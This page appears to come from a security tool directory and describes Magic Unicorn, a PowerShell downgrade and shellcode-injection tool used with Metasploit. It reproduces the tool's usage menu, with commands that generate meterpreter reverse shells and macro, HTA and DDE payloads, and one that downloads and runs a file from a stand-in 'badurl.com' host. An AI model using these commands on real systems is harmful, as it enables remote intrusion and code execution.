Magic Unicorn
Tool and Usage
Project details
- License
- Custom license
- Programming language
- Python
- Author
- David Kennedy
- Latest release
- 3.17
- Latest release date
Project health
Links
GitHub project |
Why this tool?
Magic Unicorn is a tool to perform a PowerShell downgrade attack and inject shellcode into memory.
How it works
The tool is used together with Metasploit. If Magic Unicorn is located within the right path, then execute the tool. Upon execution, a PowerShell command is generated that can be pasted in a command line window. Another option is to use a payload delivery system from within Metasploit.
Background information
Magic Unicorn is based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by our own David Kennedy and Josh Kelly at DEF CON 18.
Usage and audience
Magic Unicorn is commonly used for penetration testing or shellcode injection. Target users for this tool are pentesters and security professionals.
Features
- Command line interface
Example usage and output
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
Tool review and remarks
The review and analysis of this project resulted in the following remarks for this security tool:
Strengths
- + More than 1000 GitHub stars
- + Many releases available
- + The source code of this software is available
History and highlights
- Demo at DEF CON 26 Demo Labs
Installation
Supported operating systems
Magic Unicorn is known to work on Linux.
This tool page was updated at . Found an improvement? Help the community by submitting an update.
Related tool information
Categories
This tool is categorized as a PowerShell exploitation tool.